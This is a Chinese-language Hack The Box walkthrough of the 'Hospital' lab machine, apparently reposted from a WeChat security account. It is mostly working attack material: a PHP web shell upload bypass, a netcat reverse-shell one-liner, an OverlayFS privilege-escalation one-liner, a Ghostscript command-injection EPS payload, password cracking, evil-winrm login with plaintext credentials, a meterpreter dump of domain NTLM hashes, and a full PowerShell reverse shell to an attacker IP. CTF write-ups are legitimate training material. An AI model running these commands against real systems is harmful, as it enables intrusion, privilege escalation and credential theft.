HTB-Hospital(Medium)

admin 2023年11月24日12:44:40评论257 views字数 8687阅读28分57秒阅读模式

知识点:Single-file_PHP_shell,Ubuntu_Local_Privilege_Escalation,Ghostscript-command-injection


HTB-Hospital(Medium)


Scan

┌──(kali㉿kali)-[~/Desktop/htb/Hospital]└─$ sudo nmap -sC -sV -T4 -Pn 10.10.11.241[sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-22 07:56 ESTNmap scan report for 10.10.11.241Host is up (0.20s latency).Not shown: 980 filtered tcp ports (no-response)PORT     STATE SERVICE           VERSION22/tcp   open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)|_  256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)53/tcp   open  domain            Simple DNS Plus88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2023-11-22 19:56:57Z)135/tcp  open  msrpc             Microsoft Windows RPC139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after:  2028-09-06T10:49:03443/tcp  open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=localhost| Not valid before: 2009-11-10T23:48:47|_Not valid after:  2019-11-08T23:48:47|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28| tls-alpn: |_  http/1.1|_http-title: 400 Bad Request445/tcp  open  microsoft-ds?464/tcp  open  kpasswd5?593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0636/tcp  open  ldapssl?| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after:  2028-09-06T10:49:031801/tcp open  msmq?2103/tcp open  msrpc             Microsoft Windows RPC2105/tcp open  msrpc             Microsoft Windows RPC2107/tcp open  msrpc             Microsoft Windows RPC2179/tcp open  vmrdp?3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after:  2028-09-06T10:49:033269/tcp open  globalcatLDAPssl?| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after:  2028-09-06T10:49:033389/tcp open  ms-wbt-server     Microsoft Terminal Services| ssl-cert: Subject: commonName=DC.hospital.htb| Not valid before: 2023-09-05T18:39:34|_Not valid after:  2024-03-06T18:39:34| rdp-ntlm-info: |   Target_Name: HOSPITAL|   NetBIOS_Domain_Name: HOSPITAL|   NetBIOS_Computer_Name: DC|   DNS_Domain_Name: hospital.htb|   DNS_Computer_Name: DC.hospital.htb|   DNS_Tree_Name: hospital.htb|   Product_Version: 10.0.17763|_  System_Time: 2023-11-22T19:58:15+00:008080/tcp open  http              Apache httpd 2.4.55 ((Ubuntu))| http-title: Login|_Requested resource was login.php|_http-open-proxy: Proxy might be redirecting requests| http-cookie-flags: |   /: |     PHPSESSID: |_      httponly flag not set|_http-server-header: Apache/2.4.55 (Ubuntu)Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:| smb2-time: | date: 2023-11-22T19:58:20|_ start_date: N/A| smb2-security-mode: | 3:1:1: |_ Message signing enabled and required|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m54s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 146.47 seconds


Enum

看到88,135,139,445基本就是域控了,smb先跑一下看看能不能进共享,无果。把看到的域名hosts一下,看看web渗透有没有机会。

HTB-Hospital(Medium)先看443端口,进去只有登录框,没有注册按钮。随便看了下感觉没什么操作空间。

再看8080端口,有个make one可以注册

HTB-Hospital(Medium)注册后登录,可以看到有个upload,可以文件上传,但是常规传php文件后缀不行,被ban了

尝试使用phar文件 成功。

Phar的一些利用姿势:https://xz.aliyun.com/t/3692

HTB-Hospital(Medium)dirsearch扫目录,发现uploads目录,到这个目录下在输入文件名即可访问木马。

HTB-Hospital(Medium)但是这种基础shell system函数不能成功执行,uploads目录还有自动清理功能,过一会文件就被删除了,通过webshell执行命令得到reverse shell,在黑客论坛找到一位大哥的分享:

https://github.com/flozz/p0wny-shell/blob/master/shell.php

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.86 4444 >/tmp/f



Docker提权

我们可以拿到shell,发现是在docker内,并且是低权限用户,查看了内核版本,发现和之前的Analytics一样的提权方式

文章链接:https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability#vulnerability-1-cve-2023-2640-ovl_copy_xattr-35

https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("chmod +s /bin/bash")'
/bin/bash -p


或者这里直接打CVE-2021-3493提权

https://github.com/briskets/CVE-2021-3493/tree/main

HTB-Hospital(Medium)root后查看shadow文件可以发现以下hash,我们直接john爆破,发现可以爆破出drwilliams的密码

root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::

┌──(kali㉿kali)-[~/Desktop/htb/Hospital]└─$ john -w:/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])Cost 1 (iteration count) is 5000 for all loaded hashesWill run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusqwe123!@# (drwilliams) 1g 0:00:01:25 DONE (2023-11-22 09:02) 0.01166g/s 2498p/s 2498c/s 2498C/s raycharles..pucciUse the "--show" option to display all of the cracked passwords reliablySession completed.


webmail

得到的账密可以登录443端口的web界面

HTB-Hospital(Medium)进去发现有邮件来往,大概就是说有两个文件, 一个是eps格式,一个是GhostScript可视化,可以通过发送邮件里面加入eps格式的shell,然后他们会执行

HTB-Hospital(Medium)

GhostScript

搜一波ghostscript相关漏洞

可以发现这个项目:https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection

┌──(kali㉿kali)-[~/Desktop/htb/Hospital/CVE-2023-36664-Ghostscript-command-injection-main]└─$ python3 CVE_2023_36664_exploit.py -g --payload calc --filename geqian --extension eps[+] Generated EPS payload file: geqian.eps┌──(kali㉿kali)-[~/Desktop/htb/Hospital/CVE-2023-36664-Ghostscript-command-injection-main]└─$ cat geqian.eps                                                                       %!PS-Adobe-3.0 EPSF-3.0%%BoundingBox: 0 0 300 300%%Title: Welcome EPS
/Times-Roman findfont24 scalefontsetfont
newpath50 200 moveto(Welcome at vsociety!) show
newpath30 100 moveto60 230 lineto90 100 linetostroke(%pipe%calc) (w) file /DCTDecode filtershowpage

上面跟着github随便生成一个测试的,然后直接修改其中calc为reverse powershell即可

在线生成rev网站:https://www.revshells.com/

HTB-Hospital(Medium)然后发送邮件,即可getshell

HTB-Hospital(Medium)

User-flag

进去后得到一组账号,并且发现可以rdp

drbrown:chr!$br0wn

HTB-Hospital(Medium)rdp进去看看,password输入框的password属性改text即可看到密码

xfreerdp /v:hospital.htb /u:'drbrown' /p:'chr!$br0wn' /d:"dc.hospital.htb"

HTB-Hospital(Medium)这里用rdesktop或者remmina可能登录不了,不知道为啥(估计是协议问题???

rdesktop -u drbrown -p 'chr!$br0wn' -d dc.hospital.htb hospital.htb

HTB-Hospital(Medium)

ROOT

得到密码直接winrm即可,弹shell到msf把hashdump了

Administrator:Th3B3stH0sp1t4l9786!
evil-winrm -i 10.10.11.241 -u Administrator -p 'Th3B3stH0sp1t4l9786!'
meterpreter > getuidServer username: HOSPITALAdministratormeterpreter > hashdump[*] Meterpreter session 3 opened (10.10.14.119:6666 -> 10.10.11.241:21083) at 2023-11-22 10:42:05 -0500Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1a0158142556cfc5aa9fdb974e0352f:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:26fb7ca2f4a67b2d8d81ffcfeeeffd13:::$431000-R1KSAI1DGHMH:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_0559ce7ac4be4fc6a:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_bb030ff39b6c4a2db:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_9326b57ae8ea44309:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_b1b9e7f83082488ea:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_e5b6f3aed4da4ac98:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_75554ef7137f41d68:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_6e9de17029164abdb:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_5faa2be1160c4ead8:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::SM_2fe3f3cbbafa4566a:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::drbrown:1601:aad3b435b51404eeaad3b435b51404ee:33a3edc8fc4cf06cb3b836c541a7b997:::drwilliams:1602:aad3b435b51404eeaad3b435b51404ee:c377ba8a4dd52401bc404dbe49771bbc:::DC$:1000:aad3b435b51404eeaad3b435b51404ee:e5ab307522689fdeb58c50aec017c1a4:::


非预期

通过枚举是可以发现在xampp目录下的htdocs是有system权限的(用icacls看

HTB-Hospital(Medium)

那么意味着,医院内部网站getshell了,就直接拿到了NT AUTHORITYSYSTEM权限,那么在该文件夹加入shell,然后反弹 

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.119', 8888);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

HTB-Hospital(Medium)


原文始发于微信公众号(搁浅安全):HTB-Hospital(Medium)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月24日12:44:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Hospital(Medium)https://cn-sec.com/archives/2231318.html

发表评论

匿名网友 填写信息